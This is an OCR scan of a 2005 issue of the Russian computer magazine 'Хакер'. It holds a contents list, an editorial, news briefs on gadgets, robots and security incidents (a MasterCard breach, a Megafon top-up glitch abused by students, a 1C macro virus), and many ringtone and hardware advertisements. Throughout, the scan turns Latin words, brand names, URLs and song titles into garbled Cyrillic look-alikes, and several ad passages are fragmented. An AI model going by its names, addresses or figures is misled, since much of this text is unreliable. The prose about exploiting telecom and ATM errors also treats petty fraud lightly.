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САГА О «ПОПУГАЯХ» 
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УДАР ПО СНИФЕРУ 

УНИВЕРСИТЕТСКИЙ ХАК . 
СМЕНА КОМАНДОВАНИЯ 
СПЛОИТ ДЛЯ ѴУЕВ-А 
ЛЕКАРСТВО ДЛЯ СІЛЕРТР 

КРУЖКА КОФЕ 

ТОПИМ НАРОД.РУ 

Х-КОНКУРС 



СОЛНЦЕ ХАЙТЕКА 

ПОЧЕМ ЗОЛОТО ДЛЯ НАРОДА? 

ЖИЗНЬ ВНУТРИ ЯБЛОКА 

ОНИ ВЕРШИЛИ ИСТОРИЮ 



БУДЬ В КУРСЕ! 

ФАЙРВОЛ-НЕВИДИМКА 

ЗАХВАТ НУЛЕВОГО КОЛЬЦА 

СооіЖ 

КРЫСА НА ВЕРЕВОЧКЕ 

стряпаем 

ЛЕГКИЙ ПУТЬ К ВЕЛИКИМ ДЕЛАМ . 
ОБЗОР КОМПОНЕНТОВ 



ЗАГАДКА НОСТРАДАМУСА . 
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ІІЧТІЮ 

Темная ночь... только ветер гудит в прово- 
дах. . .все просвещенное человечество уже спит 
или занимается другим, не менее приятным вре- 
мяпрепровождением, и только редакция наше- 
го журнала кует очередной номер, пытаясь ус- 
петь к сроку. Меня посвящают ностальгические 
мысли, а вернее — мысли о том, как мы шли к 



настоящему взлому :). Давным-давно наш жур- 
нал был по большей части игровым, а то, что тог- 
да называлось взломом, нынешние читатели 
воспримут, хорошо, если с улыбкой :). Мы рос- 
ли, прогрессировали, матерели. Вместе с рас- 
ширившимся взломом зародился кодинг — и на- 
чали мы, как водится, с того, как положить на 
форму кнопочку, способную только закрыть 
форму по СІозе; но это было только начало - по- 



явился С/С++, к С постепенно добавился РНР, а 
ныне — и ассемблер. Игровая часть, постепенно 
сужаясь, сошла на нет. Что же получается в ре- 
зультате? В результате получается журнал Хакер 
в полном смысле этого слова. Мы росли вместе 
с тобой и для тебя, поэтому — изволь перевер- 
нуть страницу и насладиться нашим творчест- 
вом. В новом, кстати, дизайне. 

Александр Лозовский I выпускающий редактор 
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НІТЕСНЫЕѴѴЗЖ 



ОРГАЗМОТРОН 

1 июня 2005 года состоялся, возможно, первый в истории публич- 
ный сеанс теледильдоники. Он был приурочен к заседанию отде- 
ления ОогкВоі ( ѵѵѵѵѵѵ.сІогкЬоТ.огд ) в Сан-Франциско. Эта организа- 
ция объединяет людей, которые делают с электроникой странные 
вещи. Кульминацией июньской встречи стала интерактивная пре- 
зентация об истории и будущем плотских утех через интернет. 
Свою пылкую речь докладчица Виолетта Блю завершила словами: 
«Люди, эти исходники должны быть открытыми!» Затем началась 
трансляция из Музея секса в Нью-Йорке. Несмотря на периоди- 
ческие проблемы со связью и плывущую картинку, все в зале были 
в восторге от происходящего. После того, как буквально каждый из 
присутствующих положил свои грязные ручонки на дистанционный 
пульт управления секс-машиной, девушка Мишель за 4000 километ- 
ров затряслась в бурном оргазме. Технику для презентации пре- 
доставила компания ТПе ТОгіІІ Наттег (\л/\ллл/ЛІіеТІігіІІІіаттег.сот). 
Согласно технической спецификации модели ТНЕС01, длина 
поршня может составлять от 10 до 20 сантиметров. В разных режи- 
мах он совершает от 8 до 300 
погружений в минуту на скорос- 
ти до 6500 об/мин. Камера, ве- 
дущая трансляцию в реал-тай- 
ме, оборудована линзой с авто- 
фокусировкой и масштабирова- 
нием до 10х. Стоимость оргаз- 
мотрона составляет от 400 до 
4000 долларов. 



НА ЗАМКЕ 




Американская компания-производитель мороженого Веп & Зеггу 
(и/и/и/. Ьел/еггу. сот) выпустила кодовый замок для ведерка с хо- 
лодным лакомством. Чтобы снять пластиковое кольцо, нужно по- 
добрать комбинацию из 3 цифр. Не ахти какая головоломка для 
голодного хакера, тем не менее, позволяет честным людям ос- 
таваться честными. Как пояснили создатели, сначала замок 
хотели сделать из «пуленепробиваемой» стали, однако ме- 
талл сильно замерзал в холодильнике. Стоимость новинки — 
всего 5 долларов. 



АВТОПИЛОТ 
ДЛЯ ГЕЙМЕРА 

В Японии группа студентов под руководством Акихико Шираи раз- 
работала электронного напарника для компьютерных баталий. Ес- 
ли в прошлом компьютеры выступали только в роли противников, то 
система РоЬоСатег является правой рукой, дублером и помощ- 
ником геймера. Она состоит из видеокамеры, джойстика с об- 
ратной связью и программы распознавания изображений. Дви- 
гая рукоятку с помощью натянутых нитей, РоЬоСатег может пол- 
ностью заменить игрока за компьютером, если тому нужно сроч- 
но ответить на телефонный звонок или перехватить бутерброд. 

Система постепенно перенима- 
ет стиль игры, так что противник 
даже не заметит «потери бойца». 
В другом режиме РоЬоѲатег 
направляет и подстраховывает 
геймера, исключая очевидные 
ошибки. Система прошла обкат- 
ку на стареньких аркадах и ско- 
ро будет адаптирована под 
современные шутеры. 



ЖИВАЯ МИШЕНЬ 

4 бакса — столько просит швед Магнус Иварссон на сайте 
ѲатеНесіІіІу.зе за уникальную возможность расстрелять его из 
пейнтбольной пушки. Уменьшенная копия танка Зіиагі М5 длиной 
70 см находится в квартире Магнуса, а пользователи удаленно уп- 
равляют боевой машиной через интернет. Живое видео трансли- 
руется в реальном времени (25 — 30 ЕРЗ). С клавиатуры можно от- 
дать танку приказ двигаться вперед или назад, развернуться на 
месте или перезарядить оружие. Стрельба ведется — на выбор — 
из лазера, резиновыми флуоресцентными пулями и собственно 
шариками с краской. В стоимость включены 20 минут времени, дос- 
таточные для того, чтобы расстрелять боекомплект из 30 зарядов. 
Перед стрельбой пушку можно перевести в полуавтоматический 
режим либо совершать серийные залпы из 2 — 5 выстрелов в каж- 
дом. Максимальная скорострельность — до 20 выстрелов в секун- 
ду! Первое время Магнус не успевал зализывать раны, поэтому 
после возвращения с ЭгеатНаск 2005 он занялся строительством 
арены, на которой будут сражаться несколько роботов, управляе- 
мых операторами. Новая мечта гика — организовать воздушный 
бой авиамоделей, оборудованных пейнтбольными пушками. 
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ИНТЕРНЕТ 

В МОСКОВСКОМ МЕТРО 




Московские чиновники решили порадовать местных компьютерщиков но- 
вой услугой. В скором времени (предположительно — конец лета) в столич- 
ных станциях метро будут установлены хотспоты для беспроводного выхода 
в инет. Первыми ласточками станут «Охотный ряд», «Площадь революции» 
и «Театральная», но в планах — охватить сетью все станции Москвы. Так что те- 
перь тебе не придется дремать в вагоне, не зная чем себя занять. Бери ноут 
или КПК, врубай хл/і-И и серфи просторы глобальной Сети на скорости до 5 Мб 
в секунду, пока поезд несет тебя из точки А в точку В. Правда, цены на такой 
инет будут космические — 180 рублей в час, но будем надеяться, что со вре- 
менем их снизят, иначе создатели хотспотов будут единственными их потре- 
бителями. Ну, а если тебе не охота ждать милости чиновников, то пока техно- 



$АМ$ШМС 




/ІіМСІііЬ 

Собери телефон! 



С 1 июня по 31 августа 
2005 года заказывая 
мелодии, картинки 
или игры на сайте 
Затзипд Рип СІиЬ 
у тебя есть шанс 
выиграть 

мобильный телефон 
Затзипд ЗОН-Е720, 
а также другие 
ценные призы. 

внимание! 

#се мелодии, картинки 
и игры 

совместимы только 
с телефонами 5ат$ипс|. 



Подробнее об акции на сайте: 
\ллллл/.ги.затзипдгпоЬіІе.согп 
ѵѵар.ги.затзипдтоЫІе.сот 

Отправь 5М5 с кодом мелодии на 
номер 4446 и выиграй призы! 

СВОДНЫЙ ЧАРТ 

4630474 СІоЬаІ Оееіауз. ТНе ЗоипсІ ОТ 5ап Ргапсізсо Полчаса. Тату 4630495 
4630467 Огееп Оау. ВоиІеѵагсІ ОТ Вгокеп Огеатз БриБумер. КйѴ йО 4630502 
4630479 М/ф "Крокодил Гена". Голубой вагон После войны. Пюбэ 4630483 
4630431 К/ф "Титаник". Му Неагі ѴѴІІІ Со Оп _ Снег_идет. Глюкоза 
4630430 К/ф "Солдаты". Юность в сапогах 
4630477 Веппу Вепаззі. ЗаТізТасТіоп 
4630469 Дубцова Ирина. Как ты там 
4630472 ЗеппіТег І_орег. СеТ ПідЫ 
4630481 ВоотТипк МС'з. Ргеезіуіег 
4630465 К/ф "Турецкий гамбит" 

4630471 Фриске Жанна. Ла-ла-ла 
4630478 Серега. Черный бумер 
4630475 Звери. Запомни меня 
4630480 Шуберт. Аве Мария 
4630476 Рефлекс. Мол зіор 
4630466 Мг. Сгесіо. Медляк 
4630470 Любэ. За туманами 
4630468 АгазН. Вого Вого 
4630482 Тагкап. ОіЮи 
4630473 ЗтазН. РаіТН 

РОССИЙСКИЕ 



Знаю. Руссо Авраам 4630489 
Я люблю его. Тутси 4630496 
ОЬзеззіоп. Аѵепіига 4630488 
Самый, самый. Тутси 4630494 
Ретте Ііке II. К-Маго 4630500 
Роман. Дубцова Ирина 4630501 
Ритогз. Ыпсізау І_оНап 4630499 
РайоныКвартапы. Звери 4630487 
Кому Какое Дело. Ангина 4630498 
Напитки покрепче. Звери 4630484 
Цке Тоу Зоісііегз. Етіпет 4630490 
Идем на восток. Ногу свело 4630497 
Короли ночной Вероны. Звезды 4630493 
Вишнёвая смола. Маликов Дмитрий 4630485 
ѴѴМаТ Ѵои ѴѴаіТіпд Рог?. Сѵѵеп ЗІеТапі 4630491 
І_еі'з СеТ ІТ ЗТагТесІ. ВІаск ЕуесІ Реаз 4630492 

ЗАРУБЕЖНЫЕ 



4630508 Виа Гра. Мир, о котором я не знала... Таке оп Ме. А-На 
4630507 Смысловые галл. Зачем топтать... Мадіс Кеу. Опе-Т 
4630506 Зацепин Антон. Ниже ростом... ІМитаі Ти. 0-2опе 

4630516 Боярский Михаил. Зеленоглазое такси ВгеаТТіе. Ргобіду 
4630515 Орбакайте Кристина. Губки бантиком Киги-Киги. Тагкап 
4630517 Рефлекс. Потому что не было тебя Оезегі газе. 
4630519 Глюкоза/Сердючка. Жениха хотела І_а-І_а. АзЫее Зітрзоп 
4630520 МС Вспышкин. Колбасный цех То4іс. Вгііпеу 
4630513 Чай вдвоем. День рождения ~ 

4630511 Иванушки. Капелька света 
4630514 Ничья. Никому. Никогда 
4630504 Любэ. Старые друзья 
4630505 ЗтазЫ!. ОЬзеззіоп 
4630512 РЮѴ ЭФ Брибумер-2 
4630503 ППК. Резиггесііоп 
4630509 Иракли. Вова-Чума 
4630522 Сердючка. Хорошо 
4630518 Дельфин. Любовь 
4630521 Фабрика. Рыбка 
4630510 Звери. Герои 



ІІІизіоп. Веппу 
РіпаІ СоипТсІоѵѵп. Еигоре 
ЗЬиТ ир. ВІаск ЕуесІ Реаз 
Еѵегуііте. ВгіТпеу Зреагз 
ОгадозТеа сііп Теі. 0-2опе 
Іп ТЬе ЗЬасІоѵѵз. ТИе Казтиз 
Такіпд Оѵег Ме. Еѵапезсепсе 
5Ье ѴѴІІІ Ве ЬоѵесІ. Магооп 5 
СІеапіпд оиі ту сіозеі. Етіпет 
.Цзі Опе І_азТ Оапсе. ЗагаЬ Соппог 
І_оѵе із доппа заѵе из. Веппу 
Сиіитзе Кабегіпе (Расііо ЕсІІТ). Тагкап 

Отправьте ЗМ5 с кодом картинки на номер 



4630529 

4630536 

4630523 

4630541 

4630524 

4630530 

4630535 

4630532 

4630527 

4630528 

4630539 

4630538 

4630531 

4630526 

4630540 

4630533 

4630542 

4630534 

4630525 

4630537 

4446 



логию не ввели, у тебя есть время изучить строение \л/Иі и узнать о нем в багах. 
Как знать, авось пригодится :). 



ГЛЮЧНЫЙ БАНКОМАТ 

Представь ситуацию — ты снимаешь деньги с банкомата, и вместо деся- 
тирублевых купюр ящик выдает тебе пятисотки. Мечта? Для нас с тобой — 
да, а вот для четверых студенток из славного города Устюженск — приятная 
неожиданность. Стоит ли говорить, что после такого они стали спешно кла- 
цать на кнопки, требуя десятками все свои деньги на счету. Пополнив бюд- 
жет в 50 тысяч рублей, девочки удалились в поисках кабака, где можно было 
отпраздновать свалившееся счастье. Тем временем, несколько часов спус- 
тя, в банке обнаружили оказию и обратились в милицию. Виновником бага 
стал один из банковских операторов, который чего-то напутал и вложил 
в ячейку с десятками пятисотрублевые бумажки. Вычислить студенток много 
времени не заняло — достаточно было проверить все совершенные банко- 
матом операции. Великолепную четверку пригласили в отделение милиции, 
где они хором признались. Да, мол, срубили бабла, но мы то тут причем, — 

это все ваша вина. И в этом бы- 
ла своя доля правды. В милиции 
вежливо попросили деньги от- 
дать, но так как девочки уже ус- 
пели растрынькать 18 тысяч, от- 
дали они только 32. Впрочем, ра- 
ботники банка, признав свою 
оплошность, остальное требо- 
вать не стали, и отпустили тран- 
жирок с миром. 





5434117 5434115 5434072 




5434119 
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5434107 






5434108 




5434109 





5434104 



Подробная инструкция и список поддерживаемых моделей телефонов - 
на ѵѵѵѵѵѵ.і-ітее.ги. Служба поддержки (095) 916 72 53, (812) 118 45 75, 
е-таіі: зиррог1@іТгее.ги. Для заказа полифонических мелодий и цветных 
картинок необходимо иметь возможность ѴѴАР-доступа в Интернет, 
при загрузке картинки или мелодии дополнительно оплачивается 
ѴѴАР/СРКЗ-соединение согласно вашему тарифному плану. 

Стоимость запроса на номер 4446 (картинки и мелодии) 
составляет 0,90 доллара США без учета налогов. 

Точную стоимость в рублях можно узнать, позвонив 
в справочную службу оператора, 
предоставляющего услуги связи. В случае 
ошибочного запроса услуга считается 
оказанной и оплачивается в 
соответствии 
с тарифами. 









НГГЕСНЫЕѴѴЗЖ 
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_ БАЯ РОБОТОВ 




Японские инженеры создали робота-партнершу по бальным тан- 
цам. Рагіпег ВаІІгоот Эапсе РоЬоі ростом 165 сантиметров 
чувствует партнера, благодаря сенсору на талии, и может дви- 
гаться в любом направлении на трех колесах, спрятанных под 
вечерним нарядом из розового пластика. Когда человек делает 
шаг, роботесса в реальном времени анализирует его движения 
и определяет, как лучше расположить плечи, локти, талию и шею. 
У роботессы человеческое лицо. На голове у нее — бант, а ника- 
кие не уши Микки Мауса. Вес конструкции составляет 100 килог- 
раммов. Инженеры уже приступили к работе над мужской вер- 
сией робота-танцора. 



ХАКЕРЫ ВЗЛОМАЛИ 
МАЗТЕКСАПЛ 

В прошлом месяце произошла крупнейшая в истории утечка фи- 
нансовой информации. В качестве жертвы выступила компания 
МазіегсагсІ ІпіегпаііопаІ Іпс., во внутренней сети которой был об- 
наружен вирус. Этот электронный зверек, как оказалось, в тече- 
ние месяца передавал на сторону различную конфиденциаль- 
ную инфу о владельцах кредитных карт. Достаточную для того, 
чтобы снять деньги с их счетов. Так как МазіегсагсІ является ми- 
ровым лидером в своей области и ее услугами пользуются де- 
сятки миллионов людей, можно себе представить ажиотаж. Как 
обнаружило следствие, вирус проник в сеть компании через дру- 
жественную фирму СагсІЗузіетз Зоіиііопз Іпс., компьютеры кото- 
рой и были взломаны неизвестным хакером. Сейчас к расследо- 
ванию подключилось ФБР, и федералы делают все возможное, 
чтобы задержать взломщика. МазіегсагсІ, в свою очередь, пытает- 
ся подсчитать нанесенный ей 
урон и вернуть деньги. Хотя как 
первое, так и второе пока осу- 
ществить проблематично. Одно 
известно точно — после этого 
происшествия, а также после те- 
левизионного заявления предс- 
тавительницы компании о том, 
что вкладывая деньги в Мазіег- 
сагсі, клиенты не получают пол- 
ной гарантии, позиции лидера 
сильно пошатнулись. И расх- 
лебывать последствия придет- 
ся долго. 




МЕТАМОЗГ 

Инженеры 5опу наделила робособаку АіЬо метамозгами. Элект- 
ронный «ген» любопытства сделал возможным развитие у робота 
навыков, не заложенных в программу. В эксперименте участвовали 
полтора десятка робопсов. АіЬо поместили в детский манеж и да- 
ли мячик. В течение четырех-пяти часов роботы от простых покачи- 
ваний и преследования собственного хвоста, перешли к более 
сложным, движениям и в конце концов начали гоняться за мячи- 
ком. Это позволило ученым заключить, что возможности для обу- 
чения робопсов не имеют ограничений. Адаптивная система лю- 
бознательности, или метамозг, подталкивают роботу к решению 
новых, все более сложных задач, при этом не дают зациклиться 
на тех, что не имели продуктивных последствий. Считается, что 
коммерческая модель робособаки АіЬо может обрести мета- 
мозги уже к следующему году. 
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дырявый мегафон 

В рекламе сотовых операто- 
ров говорится, насколько удо- 
бен и надежен их сервис. Если 
с удобством можно согласить- 
ся, то надежность находится 
под большим вопросом. При- 
мером дырявости наших опе- 
раторов является случай, кото- 
рый произошел недавно. Сту- 
дент из Новочеркасска по име- 
ни Коля как-то раз, играя со 
своим телефоном, ввел сер- 
верный код компании Мега- 
фон, чтобы получить стандарт- 
ные услуги. Но где-то на ци- 
ферку ошибся и, вместо услуг, 
поимел денежное пополне- 
ние на свой счет. Коля удивил- 
ся и стал разбираться, как это 
работает. Оказалось, что при 
вводе кода деньги получаются 
не всегда, а с определенной 
периодичностью. То есть для 
получения денег на счет, нужно клацать несколько раз, пока не 
подловишь момент. Наклацав себе кучу баблосов, Коля звонил 
направо и налево, разговаривая часами со своими приятелями. 
Те заподозрили неладное и стали ему докучать, колись, мол, чу- 
вак. Коля все рассказал, показал, и в полку халявщиков прибави- 
лось. За пару месяцев впятером они наговорили на 18 тысяч руб- 
лей. Когда в офис Мегафона участились звонки с жалобами об 
отсутствии пополнения после ввода кода с карточки, оператор 
обратился в отдел «К», а те через три недели вышли на наших ге- 
роев. Парни были очень удивлены, что ими заинтересовалась ми- 
лиция, и во всем сознались. Каким образом им удавалось сни- 
мать деньги, выяснилось в результате экспериментов внутри ком- 
пании. Оказалось, что деньги снимаются у тех, кто в тот момент пы- 
тался ввести легальный код для пополнения своего счета. И поче- 
му-то работает фокус только на телефонах Егісззоп. Суд припаял 
студентам 272 статью УК и дал по 1 .5 года условно. 
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ТИХИЙ УГОЛОК 




Компания ѴатаГю представила «уголок для уединения» мелома- 
нов и любителей порнушки. Кабинка МуРоот площадью 3,5 квад- 
ратных метра позиционируется как абсолютно тихое место в до- 
ме, где можно скрыться от шумных племянников, ворчаний люби- 
мой девушки и других раздражительных факторов. Новинка пос- 
тавляется в трех расцветках. Внутри — столик для компьютера и ау- 
диосистемы, вентилятор и, конечно, замок, отпирающийся только 
изнутри. Благодаря последнему, опасность быть застигнутым за 
чтением порнушки в туалете осталась в прошлом. 



КІСК ѴОІЖ АЗЗ! 

Международная ассоциация тенниса ( ѵѵѵѵѵѵ.Шеппіз.сот ) взяла 
на вооружение необычную машину для экспериментов. Это си- 
мулятор поведения настоящих кроссовок на разных типах покры- 
тия. Машина способна воспроизводить вертикальные, горизон- 
тальные и вращательные движения ноги, и в процессе оценивать 
степень трения и антишоковые возможности кроссовок. Сталь- 
ной поршень позволяет варьировать вращающий момент и верти- 
кальную нагрузку на обувь. Несмотря на всю серьезность сего 
агрегата, в народе его незамедлительно прозвали азз кіскіпд 
тасГііпе. 




РУССКИЕ ИДУТ 




Если ты настоящий патриот и отдаешь предпочтение всему отечест- 
венному, то эта новость потрафит твоей страсти к родным берез- 
кам. Компания «Цефей», занимающаяся производством серверов 
и ноутбуков, объявила об обновлении модельного ряда своих мо- 
бильных ПК и скором выходе на розничный рынок под торговой мар- 
кой ЗЭ (ЗоІісІ Эеѵісе). «Цефей» предлагает пользователям три линей- 
ки ноутбуков. Устройства из серии Ыеііз подойдут экономным лю- 
дям или тем, кто только начинает свое знакомство с мобильными ПК. 
Это изделия начального уровня, с 14"-матрицей и процессором 
ІпіеІ МоЬіІе Репііит с частотой до 2 ГГц. Следующий уровень — это 
компьютеры Ѵізег и Ѵізег ѴѴісІе, высокопроизводительные мультиме- 
дийные модели, имеющие широкий экран (15 дюймов), большой 
объем оперативной памяти, комбинированный оптический привод 
и адаптер беспроводной связи. А серия ѴѴісІе оснащается мо- 
бильной версией графического адаптера АТІ Рабеоп 9700. Пос- 
ледняя модель, ІпІюпГ, имеет миниатюрные габариты (296x205x35 
мм, вес 1,9 кг), она станет надежным спутником путешественника. 



ЗВОНИМ ПО А81І8 

Теперь эта компания, которая выпускает практически все компо- 
ненты, необходимые для сборки ПК, вышла на рынок сотовых те- 
лефонов. Первенца назвали МЗОЗ. Это раскладушка, работаю- 
щая в трех диапазонах частот (03М 900/1800/1900 МГц), имеющая 
встроенные плеер (с наушниками в комплекте поставки) и цифро- 
вую камеру. Она может записывать видео в формате МРЕ04 и сох- 
ранять результат на карту тіпіЗЭ. Функции камеры включают в се- 
бя зум, автофокус, рамки, эффекты и прочее. Полифония заявляет о се- 
бе 64 голосами, а для связи с внешним миром через Сеть есть под- 
держка ѴѴАР 1 .2. 1 и ѴѴАР 2.0. Емкость батареи составляет 700 мА, а 
хватает ее на 5 часов разговоров. Габариты у плеера небольшие 
(83x43x22,9 мм), вес тоже — 80 г — так что его смело можно дарить 
своей девушке. Благо, его дизайн этому отнюдь не препятствует. 
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РОССИЯН ЗАНЕСУТ 
В ЕДИНУЮ БД 




Сейчас на пиратском рынке можно купить практически любую базу данных. 
Базу абонентов МТС, регистрационную базу, базу по доходам и по тем, кто 
стоит на учете милиции. Российское правительство решило, что негоже людям 
напрягаться, покупая кучу разных БД, и решило создать единую, в которой бу- 
дет подробнейшее досье о каждом жителе страны. В нее будут входить даже 
отпечатки пальцев и снимки радужной оболочки глаза! Мол, это облегчит госу- 
дарственным структурам обмен персональными данными о гражданах. По- 
добная система получила название СПУН (система персонального учета 
населения), и реализовать ее планируется в течение семи лет. Непонятно 
только, как правительство собирается защитить ее от вездесущих пиратов. 
Ведь сейчас не проблема купить любую БД, вопрос только в цене. И если СПУН 
попадет в руки мошенников, которые знают, как использовать конфиденциаль- 
ную инфу для своей выгоды, начнется настоящее веселье. Например, можно 
скопировать отпечатки пальцев какого-нибудь чиновника и, используя их, 
пройти через биометрическую систему безопасности. Возможностей мил- 
лион. Но пока можешь не беспокоиться — СПУН существует в мыслях его ав- 
торов, и в конце 2005 года проект только будет представлен на бумаге. 



ПЕРВЫЙ ВИРУС ПОД 1С 

Долгое время вирусмейкеры то ли не инте- 
ресовались системами 1С, то ли не могли 
придумать оригинальный вирусный алго- 
ритм под них. В общем, не было 1С вирусов. 
Но недавно Лаборатория Касперского 
объявила о первом таком представителе. 
Вирь с именем Ѵігиз.ІС.Тапда.а, подобно 
Оііісе'ным макровирусам, использует для 
распространения язык модулей «1С:Предп- 
риятие7,7», заражает файлы с расширени- 
ем .егі, внедряясь в них под видом микро- 
модуля, и активируется при открытии фай- 
ла. Затем проверяет в системе наличие 
библиотеки СотроипсІ.сІІІ, ищет на винте 
другие файлы .егі, в этих файлах ищет стро- 
ку Тапдо.ЕРТ.2622. Если такая строка имеется — значит файл уже заражен, 
если же нет, то в файле создается новый модуль 1С Ргодгатт іехі, в котором 
прописывается код виря для дальнейшего распространения. Правда, винт 
он не форматирует, да и вообще никакого вреда не причиняет. Вирь был на- 
писан в экспериментальных целях, и автор сам отправил его исходники в ла- 
бораторию Касперского для изучения, снабдив их подробной документаци- 
ей на русском языке. 





05С-Т7 

самая тонкая камера в мире 




Р8С-Н1 

12х оптический зум 






а 



Р5С-590 

Технология Зіатіпа 
— более 420 снимков 
от одной зарядки 
аккумулятора 



/ 

зтагійдасідеі 

официальный дистрибьютор 
Телефон: (095) 540-88-24 
ѵѵѵѵѵѵ. зпла гідасідеі. ш 
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НАРЮЫЕѴѴЗ^ 



- ДВОЙНОЙ УДАР 




Если ты считаешь, что 64-битные процессоры — это послед- 
ний писк моды, то ты очень сильно ошибаешься. В них же все- 
го одно ядро! Уже скоро такие ЦП уйдут за горизонт, а их 
место займут двуядерные изделия. Компания ІпіеІ уже анон- 
сировала свой Репііит Э, обладающий такой архитектурой. 
Этот ЦП имеет два вычислительных ядра (каждое с мегабай- 
том кэш-памяти), поддерживает технологии ІпіеІ ЕхіепбесІ 
Метогу 64, ЕпГіапсесІ ЗреесІЗіер и Ехесиіе ЭізаЫе Віі. Естест- 
венно, что новый процессор потребовал для себя нового 
чипсета. Им стал ІпіеІ 945 Ехргезз. В нем есть встроенная 7.1 
звуковая подсистема, встроенный графический адаптер 
ІпіеІ ѲгарГіісз Месііа Ассеіегаіог 950, технология ІпіеІ Маігіх 
Зіогаде для надежного хранения данных и поддержка памя- 
ти ЭЭР2 667. По утверждению компании, новый процессор 
дает выигрыш в производительности от 20 до 60%, и эти циф- 
ры должны увеличиться с выходом оптимизированного прог- 
раммного обеспечения. 



ВСЕЛЕННАЯ СІСАВУТЕ 

Компания ѲідаЬуіе, которая выпускает массу различных 
изделий, в том числе и для геймеров, точно знает, что явля- 
ется самой страшной бедой игрового компьютера. Это пе- 
регрев! Видеоплаты компании оснащены хорошими куле- 
рами по умолчанию, а теперь она выпустила новую жидко- 
стную систему охлаждения для мощных игровых процессо- 
ров. Называется этот кулер ѲідаЬуіе ЗЭ Ѳаіаху. Его 4,7- 
дюймовый вентилятор способен прогнать в час почти 500 
литров воды через трубку диаметром 1,25 см. Так как кроме 
перегрева есть еще и вторая беда — шум, то галактика 
снабжена регулятором скорости вращения вентилятора. 
Минимальная скорость — это 1200 оборотов в минуту. Систе- 
ма безопасности здесь поставлена на широкую ногу. В слу- 
чае повышения температуры до критической отметки или 
падения уровня воды ниже необходимого уровня, ЗЭ Ѳаіаху 
автоматически выключит всю систему. Начало продаж это- 
го устройства ожидается в ближайшее время. 




СЕТЕВОЙ отдых 

Наверное, ты считаешь, что после того, как человек подключил 
свой комп к локальной сети, то он пропал для общества, ему все 
заменит виртуальность — и подруг, и друзей. Но это совсем не 
так: сетевикам тоже не чуждо человеческое! Это доказывают та- 
кие мероприятия, как Ріпд-Пиво, проходящее уже в пятый раз. Уст- 
роителями праздника являются компании-провайдеры локальных 
сетей, а участниками — их подписчики, а также активные сетеви- 
ки со всей Москвы (а я на него забил, и, кажется, правильно сде- 
лал— прим. Лозовского). Судя по развлечениям, понятным прос- 
тым, несетевым людям, ребята абсолютно адекватные, а вот их 
знания теории и практики І_АИ впечатляют. Например, один из них, 
оказавшийся по совместительству музыкантом группы «Плюм-Бум» 
рассказал нам, как подключал свой подъезд к локальной сети. 
Также он поведал нам об объединении ресурсов четырех район- 
ных локальных сетей, о новых веяниях в прокладке кабелей и ор- 
ганизации І_АЫ вообще, а также сообщили новость, способную 
очень сильно обрадовать всех пользователей ЛВС — все обору- 
дование, необходимое для перевода сетей на стандарт 

ѲідаЬііІ_АІ\] сильно 



ПИНГ 

пиво 



п 



подешевело, так что 
скоро мы можем 
ожидать неслабого 
прироста скорости. 



КОМПАКТНЫЙ ОБЪЕМ 

Пора уже наконец перестать ностальгировать о смерти 3,5-дискет 
и подыскать себе новый носитель информации. Удобный, неболь- 
шой, быстрый и объемный. Например, миниатюрный ііазГі-драйв 
ЭІѲМА МоЬіІе Зіогаде Эгіѵе, емкость которого, при размерах со- 
поставимых с размерами спичечного коробка (66,7x47,4x13,6 
мм), составляет целых 4 Гб. Вес устройства составляет 48 г. Подк- 
лючается оно к компьютеру посредством шины ІІЗВ 2.0, что, поми- 
мо высокой скорости передачи данных, дает возможность обхо- 
диться без драйверов (за исключением \Л/іпсІо\л/5 98). В комплект 
поставки накопителя входят тканевый чехол для хранения и диск 
с утилитой СуЬегЫпк Ро\л/егВаскир, позволяющей легко органи- 
зовать резервное копирование данных на любых устройствах 
хранения. Интересна ценовая политика компании в отношении 
этого устройства. ЭІѲМА МоЬіІе Зіогаде Эгіѵе 4 Гб стоит на 
50% дороже 1 Гб флэш-диска, но предоставляет пользовате- 
лю в четыре раза больше дискового пространства. Предпо- 
ложительная цена устройства $140. 





Іп+еІ, Іп+еІ Іодо, Іп+еІ Іпзісіе , Іп+еІ Іпзісіе Іодо , Іп+еІ Сеп+гіпо , Іп+еІ Сепігіпо Іодо,СеІегоп,Іп+еІ Хеоп, ІпіеІ ЗреесІЗіер^Іапіигг^апсІ Репіічт аге ігасіетагкз ог гедізіегесі ігасіетагкз оі ІпіеІ Согрогаііоп ог ііз зиЬзісІіагіез іп іНе ІІпііесІ Зіаіез апсі оіЬег соііпігіез. 



АЗІІ8 рекомендует МісгозоТС® ѴѴіпсІоѵѵз® ХР РгоіеззіопаІ 





/ 



Современное оружие для покорения мира 



иши • азиз • ги 

Ѵльтратонкий и легкий 15-дюймовый ноутбук 

А5115 Ѵ6000Ѵ - это улыратонкий и легкий ноутбук с 15-дюймовой 
матрицей. Обладая утонченным и элегантным дизайном, ноутбук 
А51І5 Ѵ6000Ѵ является современным символом успеха и стиля. 

ІпіеІ® Сепігіпо™ МоЬіІе ТесЬпоІоду 

• Процессор ІпіеІ® Репішт® М 770 • МоЬіІе ІпіеІ® 915РМ Ехргезз сЬірзеі 
» ІпіеІ® ѴѴігеІе5$/РРО ІЧеіѵѵогк Соппесііоп 2915 Ь/д 
РТ-матрица с диагональю 15.0" и разрешением 5ХОА+ (1400x1050) 
АТІ МоЬіІііу™ Расіеоп™ Х600 (М24) с 128МВ НурегМетогу™ 

В I ы еіооіЬ 




Новая мобильная 
платформа от ІпіеІ® 





I Сверхтонкий и прочный корпус 
комбинация металла и стекловолокна^ 



НЕАРТ ОРТЕСНМОЮѲѴ 

Всемирная гарантия 2 года 

Телефон службы технической поддержки 
А$У$: (095) 23-11-999 



Москва: Армада-РС (095) 232-30-82, Артрон (095) 789-85-80, Аѵакот М (095) 784-67-36, Аѵапіа РС (095) 954-54-22, Белый Ветер (095) 730-30-30, РогсеСотр (095) 77 5-66-55, 
ЮМ (095) 729-57-10, ІЧЕХІІ5 (095) 928-23-67, НИКС (095) 974-33-33, 0 \- 0 \ (095) 105-07-00, ПИРИТ (095) 974-32-10, Роіагіз (095) 755-55-57, Портком (095) 101-33-64, Респект 
(095) 177-40-77, Сетевая Лаборатория (095) 500-03-05, 5М5 (095) 956-12-25; СтартМастер (095) 967-15-15, ТФК (095) 749-96-32; Умные машины (095) 780-00-41, Ф-Центр (095) 
105-64-47, ІІ5ІЧ (095) 775-82-02; Санкт-Петербург: Оізріау (812) 103-00-18, КЕЙ (812) 331-24-77, Микробит (812) 333-44-44, Компьютерный мир (812) 333-00-33; СТР 
